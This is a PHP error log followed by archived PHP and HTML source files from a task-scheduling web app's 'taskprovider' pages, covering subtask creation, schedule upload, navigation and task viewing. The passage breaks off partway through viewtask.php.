[16-Sep-2024 12:42:01 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 12:43:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 13:46:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Sep-2024 13:50:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 03:19:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 03:20:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 04:28:43 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [17-Sep-2024 04:29:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:02:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:15:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:17:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:21:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 02:48:43 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 06:09:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [23-Sep-2024 06:38:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 03:19:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:54:10 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:54:38 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:55:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:57:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 05:59:22 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 06:00:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [24-Sep-2024 12:39:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 00:12:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 00:17:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 02:18:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [25-Sep-2024 04:46:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [28-Sep-2024 07:38:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [28-Sep-2024 12:26:05 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [28-Sep-2024 12:32:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:07:15 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:44:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:45:13 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:45:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:46:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:46:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [30-Sep-2024 00:54:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:13:23 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:13:56 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:21:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 00:24:49 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 01:29:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [01-Oct-2024 04:22:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 01:00:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 01:38:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 22:33:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [02-Oct-2024 22:33:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [03-Oct-2024 22:14:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [03-Oct-2024 22:31:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [04-Oct-2024 04:42:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [06-Oct-2024 21:37:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [07-Oct-2024 21:12:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [08-Oct-2024 00:01:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [09-Oct-2024 01:10:53 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [09-Oct-2024 04:27:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Oct-2024 05:31:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [16-Oct-2024 05:32:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/taskprovider/dashboard.php on line 36 [08-Nov-2024 04:01:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:13:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:13:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:19:21 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [26-Nov-2024 00:20:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:20:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:24:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:44:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 00:44:25 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [26-Nov-2024 00:44:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 00:44:29 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 134 [26-Nov-2024 03:39:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [26-Nov-2024 03:39:15 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [26-Nov-2024 03:39:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 128 [26-Nov-2024 03:39:19 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 134 [02-Dec-2024 04:28:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [02-Dec-2024 04:28:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [02-Dec-2024 04:29:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [03-Dec-2024 08:29:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [03-Dec-2024 08:30:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 62 [03-Dec-2024 08:30:35 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 68 [03-Dec-2024 08:32:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [03-Dec-2024 08:32:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [09-Dec-2024 21:55:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [09-Dec-2024 23:46:04 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [09-Dec-2024 23:46:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 62 [09-Dec-2024 23:46:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 68 [09-Dec-2024 23:46:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 62 [09-Dec-2024 23:46:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_subtaskswithnotes.php on line 68 [09-Dec-2024 23:46:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 128 [09-Dec-2024 23:46:21 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_viewsubtasksdaywise.php on line 134 [11-Dec-2024 22:29:20 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Dec-2024 22:30:01 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [11-Dec-2024 22:30:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Dec-2024 21:56:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [10-Jan-2025 04:57:09 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Jan-2025 20:12:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Jan-2025 20:25:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [13-Jan-2025 03:40:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [13-Jan-2025 03:40:26 UTC] PHP Deprecated: base64_decode(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/Classes/System.php on line 29 [13-Jan-2025 03:40:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [13-Jan-2025 03:41:26 UTC] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/taskprovider/report_alltasks.php on line 19 [13-Jan-2025 22:01:48 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [14-Jan-2025 23:37:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:01:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:41:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:50:19 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Jan-2025 21:50:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [16-Jan-2025 00:12:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [16-Jan-2025 02:05:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [16-Jan-2025 23:38:54 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [17-Jan-2025 02:20:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [17-Jan-2025 04:56:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [20-Jan-2025 04:13:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [22-Jan-2025 21:27:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [22-Jan-2025 22:11:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [24-Jan-2025 03:45:58 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [24-Jan-2025 03:46:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 00:29:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 00:30:00 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 02:40:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 03:38:56 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [30-Jan-2025 04:45:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [05-Feb-2025 03:15:03 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [05-Feb-2025 04:25:05 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Feb-2025 21:36:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Feb-2025 22:32:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [11-Feb-2025 23:57:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [12-Mar-2025 21:46:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [08-Apr-2025 01:34:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [10-Apr-2025 03:33:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/taskprovider/dashboard.php on line 36 [15-Apr-2026 10:57:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 11:00:40 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 taskprovider/add_subtask.php000064400000002236151676701240012272 0ustar00<?php // Check if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST') { require_once '../../Classes/Subtask.php'; require_once '../../Service/SubtaskService.php'; require_once '../../Service/TaskService.php'; // Retrieve and sanitize input data $task_id = $_POST['task_id']; $service_id = $_POST['service_name']; $subtask_date = $_POST['subtask_date']; $subtask_time = isset($_POST['subtask_time']) ? $_POST['subtask_time'] : null; $now = new DateTime(); $created_at = $now->format('Y-m-d H:i:s'); $updated_at = $now->format('Y-m-d H:i:s'); // Create a new Subtask object $subtask = new Subtask('', $task_id, $service_id, $subtask_date, $subtask_time,$created_at,$updated_at,0,"",0,"","",""); // Instantiate SubtaskService $subtaskService = new SubtaskService(); // Replace with your SubtaskService class instantiation // Attempt to add the subtask if ($subtaskService->addSubtask($subtask)) { echo "Subtask added successfully!"; } else { echo "Failed to add subtask."; } } else { echo "Invalid request method."; } ?> taskprovider/uploadSchedule.php000064400000016126151676701240012752 0ustar00<?php include('head.php'); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-upload bg-blue"></i> <div class="d-inline"> <h5>Upload Schedules</h5> <span>Upload schedules via CSV or Excel files</span> </div> </div> </div> <div class="col-lg-4"></div> </div> </div> <div class="card"> <div class="card-header"> <h3>Upload Schedules</h3> </div> <div class="card-body"> <div id="drop-area" class="drop-area"> <form id="uploadForm" class="my-form" enctype="multipart/form-data"> <p>Drag and drop your file here, or click to select it.</p> <input type="file" name="csv_file" id="csv_file" accept=".csv, .xls, .xlsx"> <!-- Hidden current user id --> <input type="hidden" name="current_user_id" value="<?php echo $companyId; ?>"> </form> </div> <button id="uploadBtn" class="btn btn-primary">Upload</button> <div id="overlay" class="overlay"> <div class="loader"></div> <p>Uploading...</p> </div> <div id="responseMessage"></div> </div> </div> </div> </div> <style> .drop-area { border: 2px dashed #ccc; padding: 20px; text-align: center; transition: border .3s ease-in-out; } .drop-area.highlight { border-color: #007bff; } .button { display: inline-block; padding: 8px 20px; background-color: #007bff; color: #fff; cursor: pointer; border-radius: 4px; margin-top: 10px; } .button:hover { background-color: #0056b3; } .overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); justify-content: center; align-items: center; z-index: 999; } .overlay .loader { border: 6px solid #f3f3f3; border-radius: 50%; border-top: 6px solid #3498db; width: 50px; height: 50px; animation: spin 1s linear infinite; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <!-- SweetAlert CDN --> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> document.addEventListener('DOMContentLoaded', function() { let dropArea = document.getElementById('drop-area'); let overlay = document.getElementById('overlay'); let responseMessage = document.getElementById('responseMessage'); // Prevent default drag behaviors ['dragenter', 'dragover', 'dragleave', 'drop'].forEach(eventName => { dropArea.addEventListener(eventName, preventDefaults, false); }); function preventDefaults(e) { e.preventDefault(); e.stopPropagation(); } // Highlight drop area when item is dragged over it ['dragenter', 'dragover'].forEach(eventName => { dropArea.addEventListener(eventName, highlight, false); }); ['dragleave', 'drop'].forEach(eventName => { dropArea.addEventListener(eventName, unhighlight, false); }); function highlight(e) { dropArea.classList.add('highlight'); } function unhighlight(e) { dropArea.classList.remove('highlight'); } // Handle dropped files dropArea.addEventListener('drop', handleDrop, false); function handleDrop(e) { let dt = e.dataTransfer; let files = dt.files; handleFiles(files); } function handleFiles(files) { const formData = new FormData(); formData.append('csv_file', files[0]); formData.append('current_user_id', <?php echo $companyId; ?>); // Show overlay while uploading overlay.style.display = 'flex'; Swal.fire({ title: 'Uploading...', text: 'Please wait while the file is being uploaded.', allowOutsideClick: false, onBeforeOpen: () => { Swal.showLoading(); } }); fetch('../process_upload.php', { method: 'POST', body: formData }).then(response => response.json()) .then(data => { console.log(data); // Hide overlay on response overlay.style.display = 'none'; Swal.close(); // Close Swal loading indicator if (data.success) { Swal.fire({ icon: 'success', title: data.message, text: 'File uploaded successfully' }); } else { Swal.fire({ icon: 'error', title: 'Upload Failed', text: 'File upload failed: ' + data.error }); } // Display response message responseMessage.innerHTML = data.success ? '<div class="alert alert-success">Schedule uploaded successfully.</div>' : '<div class="alert alert-danger">File upload failed: ' + data.error + '</div>'; }).catch(error => { console.error('Error:', error); // Hide overlay on error overlay.style.display = 'none'; Swal.close(); // Close Swal loading indicator Swal.fire({ icon: 'error', title: 'Upload Failed', text: 'An error occurred while uploading the file.' }); // Display error message responseMessage.innerHTML = '<div class="alert alert-danger">An error occurred while uploading the file.</div>'; }); } // Optional: Handle form submission (if needed) document.getElementById('uploadBtn').addEventListener('click', function(e) { e.preventDefault(); handleFiles(document.getElementById('csv_file').files); }); }); </script> <?php include('footer.php'); ?> taskprovider/navbar.php000064400000010126151676701240011254 0ustar00<div class="modal fade apps-modal" id="appsModal" tabindex="-1" role="dialog" aria-labelledby="appsModalLabel" aria-hidden="true" data-backdrop="false"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><i class="ik ik-x-circle"></i></button> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="quick-search"> <div class="container"> <div class="row"> <div class="col-md-4 ml-auto mr-auto"> <div class="input-wrap"> <input type="text" id="quick-search" class="form-control" placeholder="Search..." /> <i class="ik ik-search"></i> </div> </div> </div> </div> </div> <div class="modal-body d-flex align-items-center"> <div class="container"> <div class="apps-wrap"> <div class="app-item"> <a href="#"><i class="ik ik-bar-chart-2"></i><span>Dashboard</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-mail"></i><span>Message</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-users"></i><span>Accounts</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-shopping-cart"></i><span>Sales</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-briefcase"></i><span>Purchase</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-server"></i><span>Menus</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-clipboard"></i><span>Pages</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-message-square"></i><span>Chats</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-map-pin"></i><span>Contacts</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-box"></i><span>Blocks</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-calendar"></i><span>Events</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-bell"></i><span>Notifications</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-pie-chart"></i><span>Reports</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-layers"></i><span>Tasks</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-edit"></i><span>Blogs</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-settings"></i><span>Settings</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-more-horizontal"></i><span>More</span></a> </div> </div> </div> </div> </div> </div> </div>taskprovider/delete_schedule.php000064400000001234151676701240013121 0ustar00<?php require_once '../../Classes/Database.php'; require_once '../../Service/ScheduleService.php'; require_once '../../Classes/System.php'; $System = new System(); $scheduleService = new ScheduleService(); if (isset($_POST['scheduleId']) && !empty($_POST['scheduleId'])) { $scheduleId = $System->decryptData($_POST['scheduleId']); if (!$scheduleId) { echo "Invalid Schedule ID"; exit; } $deleteResult = $scheduleService->deleteScheduleWithTasks($scheduleId); if ($deleteResult) { echo "success"; } else { echo $deleteResult; } } else { echo "Schedule ID is missing"; } ?> taskprovider/viewtask.php000064400000100416151676701240011642 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Check if task ID is provided in URL if (isset($_GET['id'])) { // Fetch task details based on ID $taskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$taskId) { echo '<script> Swal.fire({ title: "Invalid task ID", text: "The URL parameter is invalid. Please go back and try again.", icon: "error", confirmButtonText: "Ok" }).then(() => { window.location.href = "tasks.php"; }); </script>'; } $task = $taskService->getTaskById($taskId); // show error if the task is not found with Swal alert if (!$task) { exit(); } } else { echo '<p>No task ID provided.</p>'; } $subtasks = $taskService->getSubtasksByTaskId($taskId); $subtaskDates= ''; for ($i = 0; $i < count($subtasks); $i++) { $subtaskDates .= '"' . $subtasks[$i]->subtask_date . 